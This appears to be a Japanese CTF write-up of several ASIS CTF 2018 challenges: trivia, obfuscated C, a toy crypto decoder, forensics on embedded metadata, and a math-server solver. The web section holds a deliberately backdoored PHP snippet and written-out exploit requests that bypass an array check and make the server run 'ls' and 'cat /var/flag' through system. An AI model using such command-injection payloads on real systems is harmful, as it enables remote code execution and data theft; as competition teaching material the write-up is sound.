Welcome
Category
Trivia
Description:Welcome to ASISCTF.
フラグは、
ASISCTF@asisctfASIS{Welcome_to_ASISCTF_Let's_increase_the_world's_entropy}
2018/04/29 03:00:01
ASIS{Welcome_to_ASISCTF_Let's_increase_the_world's_entropy}
です。
Welcome to ASISCTF.
フラグは、
ASISCTF@asisctfASIS{Welcome_to_ASISCTF_Let's_increase_the_world's_entropy}
2018/04/29 03:00:01
ASIS{Welcome_to_ASISCTF_Let's_increase_the_world's_entropy}
Must-Have Pre-Workout Warm up Challenge.
#define M 37#define q (2+M/M)#define v (q/q)#define ef ((v+q)/2)#define f (q-v-ef)#define k (8-ef)struct b{int64_t y[13];}S;int m=1811939329,N=1,t[1<<26]={2},a,*p,i,e=73421233,s,c,U=1;g(d,h){for(i=s;i<1<<25;i*=2)d=d*1LL*d%m;for(p=t;p<t+N;p+=s)for(i=s,c=1;i;i--)a=p[s]*(h?c:1LL)%m,p[s]=(m*1U+*p-a)*(h?1LL:c)%m,*p=(a*1U+*p)%m,p++,c=c*1LL*d%m;}l(){while(e/=2){N*=2;U=U*1LL*(m+1)/2%m;for(s=N;s/=2;)g(136,0);for(p=t;p<t+N;p++)*p=*p*1LL**p%m*U%m;for(s=1;s<N;s*=2)g(839354248,1);for(a=0,p=t;p<t+N;)a+=*p<<(e&1),*p++=a%10,a/=10;}}z(n){int y=3,j,c;for(j=2;j<=n;){l();for(c=2;c<=y-1;c++){l();if(y%c==0)break;}if(c==y){l();j++;}y++;}l();return y-1;}main(a, pq) char* pq;{int b=sizeof(S),y=b,j=M;l();int x[M]={b-M-sizeof((short int) a),(b>>v)+(k<<v)+ (v<<(q|ef)) + z(v+(ef<<v)),(z(k*ef)<<v)-pow(ef,f), z(( (j-ef*k)|(ef<<k>>v)/k-ef<<v)-ef),(((y+M)&b)<<(k/q+ef))-z(ef+v),((ef<<k)-v)&y,y*v+v,(ef<<(q*ef-v-(k>>ef)))*q-v,(f<<q)|(ef<<(q*f+k))-j+k,(z(z(z(z(z(v)))))*q)&(((j/q)-(ef<<v))<<q)|(j+(q|(ef<<v))),y|(q+v),(ef<<ef)-v+ef*(((j>>ef)|j)-v+ef-q+v),(z(j&(b<<ef))&(z(v<<v)<<k))-(q<<v)-q,(k<<q)+q,(z(y)>>(ef<<v))+(z(k+v))-q,(z(z(k&ef|j))&b|ef|v<<f<<q<<v&ef>>k|q<<ef<<v|k|q)+z(v<<v)+v,(ef>>v)*q*z(k-v)+z(ef<<ef&q|k)+ef,z(k<<k)&v&k|y+k-v,z(f>>ef|k>>ef|v|k)*(ef>>v)*q,(ef<<k-ef<<v>>q<<ef*ef)-j+(ef<<v),z(ef*k)*z(v<<v)+k-v,z((z(k)<<z(v)))&y|k|v,z(ef<<ef<<v<<v)/ef+z(v<<ef|k|(b>>q)&y-f)-(ef<<q)+(k-v)-ef,k<<(ef+q)/z(ef)*z(q)&z(k<<k)|v,((z(y|j>>k*ef))%ef<<z(v<<v<<v)>>q<<q|j)/ef+v,(j-ef<<ef<<v*z(v>>v<<v)>>ef)/ef%z(k<<j)+q,z(k-v)+k|z(ef<<k>>v<<f)-z(q<<q)*ef>>v,(z(ef|y&j|k)%q|j+ef<<z(k|ef)%k<<q|ef|k<<ef<<q/ef|y/ef+j>>q)&k<<j|ef+v,84,z(v*ef<<ef<<q)*q%ef<<k|k|q-v,((z(20)*v)|(f>>q)|(k<<k))/ef-(ef<<(v*q+ef))-(k<<q)+z(k)-q};while(j--){putchar(x[M-v-j]);}printf(" From ASIS With Love <3\n");return 0;}
#include <stdint.h>#include <stdio.h>
$ gcc warmup.c
$ ./a.outASIS{hi_all_w31c0m3_to_ASISCTF} From ASIS With Love <3
ASIS{hi_all_w31c0m3_to_ASISCTF}
Welcome to ASIS Early School.
#!/usr/bin/pythonfrom Crypto.Util.number import *from flag import FLAG, rounddef encrypt(msg):assert set(msg) == set(['0', '1'])enc = [msg[i:i+2] + str(int(msg[i]) ^ int(msg[min(i+1, len(msg)-1)])) for i in range(0, len(msg), 2)]return ''.join(enc)ENC = bin(bytes_to_long(FLAG))[2:]for _ in xrange(round):ENC = encrypt(ENC)fp = open('FLAG.enc', 'w')fp.write(long_to_bytes(int(ENC, 2)))fp.close()
#!/usr/bin/pythonfrom Crypto.Util.number import *def decrypt(enc):msg = [enc[i:min(i+2, len(enc)-1)] for i in range(0, len(enc), 3)]return ''.join(msg)fp = open('FLAG.enc', 'r')FLAG = fp.read()fp.close()ENC = bin(bytes_to_long(FLAG))[2:]i = 1while True:ENC = decrypt(ENC)print(i)if ENC.startswith('1000001'):print(long_to_bytes(int(ENC, 2)))breaki += 1
19回繰り返したところでフラグを得ることができました。$ python2 bbb.py12345678910111213141516171819ASIS{50_S1mPl3_CryptO__4__warmup____}
ASIS{50_S1mPl3_CryptO__4__warmup____}です。
Are LaTeX and PlAsTiC the Same? It seems that they have very different compounds.
$ file plasticplastic: PNG image data, 1612 x 74, 8-bit/color RGBA, non-interlaced
取り出して
を改行に置き換えると、次にようになります。<rdf:li xml:lang="x-default">AAAFWHjabVRfbBRFGJ/ZOeifa+m2hVJaoNf2iohQtndX9ipS29IeVuwVe/1zbfc4
5/bm7pbu7V5255DjaDISozExaggxSIxC+2KRqBhjCPFBQwgmPggtSnySFx98IP57
ML4590dEw2w2+33fzHzz+37fbyeW0TWbStIdKCDHuvUvngi7jxPL1kwj7DZjx4hK
7Vk3ttSUxsOTbmpmGgB85cLHYntFZXtHp7trx2M7H9/1RI+/78DgoWeC4zNhJarG
U7pp0ym3kdX1tapqZ02TayYY6l4gOXuOf8t5p92qjm17pXZDnVjf0LhxExMYYg62
jq1nFaySVbHqlc3NW1pat27b3sacrIZtYHWsnrWwVraNbWeucAzbRNcMMqWaumlN
ps04maIa1Uk4YxGcjukkksZJQ0toKqa8pMk4piQq1sWwupC0zKwRP1jYOGebWUsl
k+QE7QTlsbZ7j7N7rzQVDE0cGlKCoeLCUAarZFzcJXX3+fd5fL19/j6/S+qWJLnH
I/XxIXsLrkf2eX0Sj/YCEbLaVY/X1ztXKtbAaRIumcSeKadd2if/Y4aDofEiO6Jj
1fnk/qdmOV02tTQjycQjPFH/0xx+MDSWpZhXFyrOLPcPyHxfyVkbch4cHgk88Dn0
QcqtWJYSmzWwLawxKq4qcVPNpolBi0jme6QMjeSxRTVVJ4vVStYmvNIFnCTz3Cxg
tiP5IseLri4eibsSpsVfg7qK0Yd35HHatnPpGF+ZxjRl/3+uEHzU3HyWJvyRvGZk
OFJDLR2UyOouarpoLkNccc3ivOg5bmDV0jhWl5rCFlYp12t1QWajh8cuPss2XnyO
bWLN08FQgAO8c+T5CWdocmqa+yHtJOHEJAI6TtrcD/LCOgd2lhouiqyJbZ4eMw2s
mpzp2blyhqV5uWzxaOQoJ3RYUwtqwlZuKSLz4As4KjY8xHO8RP1STH5kvHNgqHTk
KnEmkoUfg2ocyOCXfrLwp/oT28pTasf4mcNcrUsLctkqKDK9Vwr0uPgDWG2h05mR
AGsr9fRAXoklXIOh0dCiku+V0l4l6stkbCWa7R1RomNeGXPx+5RofNyQlehonyFN
ECVKU96x9nZlkR+ZPR4VGx9I698al7MRuSi6wyRH4oPlq+B27uSkZZqUQVAJ6kEL
6AR7gAfIYB5gkAIZkAenwevgDfAWOAPOgrfBOXAevAveAx+AS+Ay+Ah8Aj4Fn4HP
wVVwDXwBboBvwC3wPfgR3Ae/Qwesg82wDXZBD4xCDFWYgjY8BV+Gr8I34Tl4Hr4P
V+CH8DK8Aq/Dm/AWvAvvwfvwF/gb/EP4WvhWuC2sCd8Jd4UfhHvCz8Kvwl8IoCrk
RLWoDjWhVtSButBu1IP60SAKoHl0FNnoFHoJvYbOoLPoHXQBLaNL6Aq6iq6hr9B1
dAPddFQ4ahwdjh0Ov2O/Y6DUQQGWr4s8+M9wDP0NfUGwlA==
</rdf:li>
これをbase64でデコードし、できたファイルをbinwalkで確認します。AAAFWHjabVRfbBRFGJ/ZOeifa+m2hVJaoNf2iohQtndX9ipS29IeVuwVe/1zbfc45/bm7pbu7V5255DjaDISozExaggxSIxC+2KRqBhjCPFBQwgmPggtSnySFx98IP57ML4590dEw2w2+33fzHzz+37fbyeW0TWbStIdKCDHuvUvngi7jxPL1kwj7DZjx4hK7Vk3ttSUxsOTbmpmGgB85cLHYntFZXtHp7trx2M7H9/1RI+/78DgoWeC4zNhJarGU7pp0ym3kdX1tapqZ02TayYY6l4gOXuOf8t5p92qjm17pXZDnVjf0LhxExMYYg62jq1nFaySVbHqlc3NW1pat27b3sacrIZtYHWsnrWwVraNbWeucAzbRNcMMqWaumlNps04maIa1Uk4YxGcjukkksZJQ0toKqa8pMk4piQq1sWwupC0zKwRP1jYOGebWUslk+QE7QTlsbZ7j7N7rzQVDE0cGlKCoeLCUAarZFzcJXX3+fd5fL19/j6/S+qWJLnHI/XxIXsLrkf2eX0Sj/YCEbLaVY/X1ztXKtbAaRIumcSeKadd2if/Y4aDofEiO6Jj1fnk/qdmOV02tTQjycQjPFH/0xx+MDSWpZhXFyrOLPcPyHxfyVkbch4cHgk88Dn0QcqtWJYSmzWwLawxKq4qcVPNpolBi0jme6QMjeSxRTVVJ4vVStYmvNIFnCTz3CxgtiP5IseLri4eibsSpsVfg7qK0Yd35HHatnPpGF+ZxjRl/3+uEHzU3HyWJvyRvGZkOFJDLR2UyOouarpoLkNccc3ivOg5bmDV0jhWl5rCFlYp12t1QWajh8cuPss2XnyObWLN08FQgAO8c+T5CWdocmqa+yHtJOHEJAI6TtrcD/LCOgd2lhouiqyJbZ4eMw2smpzp2blyhqV5uWzxaOQoJ3RYUwtqwlZuKSLz4As4KjY8xHO8RP1STH5kvHNgqHTkKnEmkoUfg2ocyOCXfrLwp/oT28pTasf4mcNcrUsLctkqKDK9Vwr0uPgDWG2h05mRAGsr9fRAXoklXIOh0dCiku+V0l4l6stkbCWa7R1RomNeGXPx+5RofNyQlehonyFNECVKU96x9nZlkR+ZPR4VGx9I698al7MRuSi6wyRH4oPlq+B27uSkZZqUQVAJ6kEL6AR7gAfIYB5gkAIZkAenwevgDfAWOAPOgrfBOXAevAveAx+AS+Ay+Ah8Aj4Fn4HPwVVwDXwBboBvwC3wPfgR3Ae/Qwesg82wDXZBD4xCDFWYgjY8BV+Gr8I34Tl4Hr4PV+CH8DK8Aq/Dm/AWvAvvwfvwF/gb/EP4WvhWuC2sCd8Jd4UfhHvCz8Kvwl8IoCrkRLWoDjWhVtSButBu1IP60SAKoHl0FNnoFHoJvYbOoLPoHXQBLaNL6Aq6iq6hr9B1dAPddFQ4ahwdjh0Ov2O/Y6DUQQGWr4s8+M9wDP0NfUGwlA==
$ binwalk -a aaa.binDECIMAL HEX DESCRIPTION-------------------------------------------------------------------------------------------------------4 0x4 zlib compressed data
import zlibf = open('aaa.bin', 'rb')dummy = f.read(0x04)data = f.read()f.close()dc = zlib.decompress(data)f = open('bbb', 'wb')f.write(dc)f.close()
$ file bbbbbb: Apple binary property list
$ strings bbb(略)={\bf ASIS}\{50m3\_4pps\_u5E\_M37adat4\_dOn7\_I9n0Re\_th3M!!\}23uv_NSMutableDictionaryu]7_NSKeyedArchiveryzTroot
です。ASIS{50m3_4pps_u5E_M37adat4_dOn7_I9n0Re_th3M!!}
Beautify php code! Here
まず、POSTでパラメータbを配列の形で’admin’と’oloco’の2つ送信する必要がありますが、0番目が’admin’ではダメなので、PHPのバグを利用して次のように送信してみます。2^32=4294967296です。これは配列での比較(===)では一致(True)となりますが、配列の0番目の要素にアクセスすると初期化されていないことになります。<?phpinclude('oshit.php');$g_s = ['admin','oloco'];$__ni = $_POST['b'];$_p = 1;if(isset($_GET['source'])){highlight_file(__FILE__);exit;}if($__ni === $g_s & $__ni[0] != 'admin'){$__dgi = $_GET['x'];$__dfi = $_GET;foreach($__dfi as $_k_o => $_v){if($_k_o == $k_Jk){$f = 1;}if($f && strlen($__dgi)>17 && $_p == 3){$k_Jk($_v,$_k_o); //my shell :)}$_p++;}}else{echo "noob!";}
b[4294967296]=admin&b[1]=olocoFiddlerで[Replay]-[Reissue and Edit]を使用して、次にようにリクエストを送信します。
?x=123456789012345678&0=0&ls=systemFiddlerで次のようにリクエストを送信してみます。
?x=123456789012345678&0=0&ls%09/var=systemすると次のように結果が返ってきました。
backupscacheflagliblocallocklogoptrunspooltmpwww
フラグが表示されました。?x=123456789012345678&0=0&cat%09/var/flag=system
ASIS{f52c5a0cf980887bdac6ccaebac0e8428bfb8b83}フラグは、
ASIS{f52c5a0cf980887bdac6ccaebac0e8428bfb8b83}です。
For a given large integer n, find the nearest perfect power that is equal or smaller than n.
nc 37.139.22.174 11740
import socketimport sysimport stringimport randomimport hashlibimport math###########################def hash_test(hash):n = 5while True:random_str = ''.join([random.choice(string.ascii_letters + string.digits + string.punctuation) for i in range(n)])if hash == hashlib.sha256(random_str).hexdigest()[-6:]:return random_strdef nroot(n, k):x = 2 ** int(math.ceil(math.log(n, 2)/k))y = ((k-1)*x + n / x ** (k-1)) / kwhile y < x:x = yy = ((k-1)*x + n / x ** (k-1)) / kreturn xdef solve(n):r = float('inf')y = 2while True:x = nroot(n, y)m = n - x ** yif r > m:r = mif x == 2:breaky += 1return rhost = '37.139.22.174'if len(sys.argv) > 1:host = sys.argv[1]port = 11740if len(sys.argv) > 2:host = int(sys.argv[2])client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)client.connect((host, port))client_file = client.makefile('b')while True:s = client_file.readline().strip()print(s)if 'Submit a printable string X, such that sha256(X)[-6:]' in s:breakhash = s.split()[9]a = hash_test(hash)print(a)client_file.write(a + "\n")client_file.flush()while True:while True:s = client_file.readline().strip()print(s)if s.startswith('n = '):breakelif 'ASIS{' in s:sys.exit()n = int(s.split()[2])while True:s = client_file.readline().strip()print(s)if 'To win the flag, submit r :)' in s:breakr = solve(n)print(r)client_file.write(str(r) + "\n")client_file.flush()
>ccc.py*****************************************************************************| Welcome to the Near Neighbor Problem, only mathematicians know the flag!! || Your mission is to find smallest natural number r for given n, such that || there exist integers x, y: n - x**y = r > 0, x > 1 and y > 1. good luck!! |*****************************************************************************Submit a printable string X, such that sha256(X)[-6:] = fb18ddi1++(Please be patient ...It takes a few seconds to load ...n = 42713653694583983917620633592482448293294093258667415643252682236167888288964999713885812047533602109960168082130810948514035606387087967935594322305474125977354110862303478451015550305544814896711627803736665360621081230492228907432486729823918397977491607816749292910570447379496441921865495916775310468527140030451083906354541516728225151616776547670010327038887765396600316566279294093701940815771548023557472233154394104045165112075492632295386261916504936672258184211757240396922852248405647272131238621214104903342821311907655510975811492771148217955616721879060175182912822690333624279243631263938197402278898713444374965478809525154324961291401697549189065199114170246756531312184508886269455303476883915075611954490200843557161122839278006298154207231707901194058849003875281067527059480661749386360293897767533477457119541287157895459572460126976224384416438750189871295788To win the flag, submit r :)4459606347895459572460126976224384416438750189871295788Great! :) please pass the next stage :Pn = 924257951149882570317917711254673494448840369977224014381744199905788559823867115663520627473666To win the flag, submit r :)3623664227916706834366291295490Great! :) please pass the next stage :Pn = 65479758012639802017637216949111190165775936308342951533429010383261508472997822758685306430423975715111257497850480690866939487548033779052220523490514490329325080907105034355378449479535504299026482146500942630540193926289616449335261298177869552294913541025074865786996895579458195472000858373211577122436897518360407589533429207756672693902458310229293285183047704068948226937369541524699815867986295192206591734728To win the flag, submit r :)166861975878844103Great! :) please pass the next stage :Pn = 217767580286127017190145533588803219848286319785898002433687115334542020630900969886690141088296477253939369853296204945210719758876534662130978363080440623651560881192412296228443096503146937981533578909952628891621309547725977275218874177043267826828489126765819157664677814456120164453469156088499304205808558888507588613388971418094024635697007295411179752293456625759040682154026255906740801237720603078057762603849512862407652271059275090405605732274437010097949054986308333152879473562023994660452792100586673285019917529657242954558167519493373896387016422341395137695658959561368034439773888289999650713891464374990076436137303569130110298599113198112321996084377399816203845185168347145130320696047287365519994784995399187688665609440580895To win the flag, submit r :)8916891587871Great! :) please pass the next stage :Pn = 284477657175020238466381705031890624059673697588531438615565748803397181660936153169604142697233704020337293792389094466850509988785581342482327916496783450987401360133222989546392641321734053647396552981571037168040752960602672269153138323875514116268145661695528626712731506962302694526736493218673715635157039166099513109345713963313619841316821792046713238054614031786159100854417186292494885247825323939639455587574728838157238413485822299833654446753880023610472347460605439900723468985557266609763729082722418880788208670600558583226837174354207604141787526553596859305997349949585312204722374969479693811452708735044950986335035368318090725293608603307710688150869214554988100461797667329927214643249930342991669272013622239738135130670361980031485000118982755276270302407149965513820460060374000054480175477038831701074201584241548698111938843837240054225023331609638536054564498344867098347471634432000000000000000000000000000000000000433930856920505To win the flag, submit r :)433930856920505Great! :) please pass the next stage :Pn = 446812435463188228108507290517210934738976598075494463136252007658339499637332994778105048922921464416669623002960271938850251682688764630788078036374647127041150118095011245893717827001755139199539421256770251068054732628742653464707162470860867744644963513881626379295384868112521047478164340907648529396784829200044931951797398703223901613276374685005024596744539519881478197603392118613248423434290147783738349455206600361135767097728253899859300673023101217851592046508565998569554335284385533874213142078824927083941413815942201397168667551490343064477047456055738161122065405487954242757780650044346388918733082125581709373617193766794064656980908086996490008873091220888652781460009349617883870799390034720209402298176335296187821878769164995809396380376506331To win the flag, submit r :)8155Great! :) please pass the next stage :Pn = 75216526271596365311583689648476617619334557709224915570712662525413220141371045989999405989638228739411340436002271022400381247452009561000639974705495587182612529351777097717361894152365141347947250740885976606619478983476894623670299192399177180129716452337872279277598532821198928032602650079360700842927323509917702246762441979641574097063576416656904964301927680248490944387995994161003221722158747368504184217682101852081020960491331222922857528086820561255265746827308708839025258945938509508169437710750389834308817065020082336679152444103349536529931359395079539701071935487151259384813056171879879517555672615959928424713596005783112836962659196492152031673232254654110625437249926218021974082625255380287031635856724897574407894876655832486245531944725225027594374293445689098205172530618340893154960824093925444630397011473557590448532064215621285079950285175To win the flag, submit r :)14Great! :) please pass the next stage :Pn = 109663082557579957314455694977075611015747884106290102778850729721710104575094274235324451060911421761717718331882413733885744274850343420878696081584048247181046214892315391606024003354786054662249377678632586577713056745701166607529498278345746579790851739703298387607506170435901824582475185779036675531391240140276085855139067540648819178387To win the flag, submit r :)7423632694594406092782500625819012Great! :) please pass the next stage :Pn = 588334255385556920933603368744437635265552701720661258181825549814157440887345039407764275447466968183792287805809886150808408670153932189299948446865649979103881307697092813707353891553936938800140371900425849458878165771292883754962173243336747771852533608966976979620999325399635100997728258626366044918508026114368427978354348607215753097906228006150869712874898919395624788577025895176028307988564456950422766256767359709154322320201484616292290537063841343690354024677937559124697194001925444305912835725670824029454310472193179621455267997047394594823746983176081674614834267106682520365722985390190882680831944374203461420959To win the flag, submit r :)7226762933174749005610338152233594024239337246Great! :) please pass the next stage :Pn = 7679142641166565255095917848871911626457133586193968174930409925402706618434369752551165389517671470946020800744029131427767708161978734834769623349707042659147947364828123196767828464614045195803256968221340008975313967931131264963933022531035872220497783722670222475580564279044798495468640657259776902332702844388231289951144765623188840737110169116991493382496139979875863789945583293687288532942884251537481724446324204868067194057717835331654512731795253400395738977160030813543111687201120043To win the flag, submit r :)405542619814120497659187307652485433201479685770049178122950Congratz! :) You got the flag: ASIS{36812f76cce2753e482ac6f68f9d3012}
ASIS{36812f76cce2753e482ac6f68f9d3012}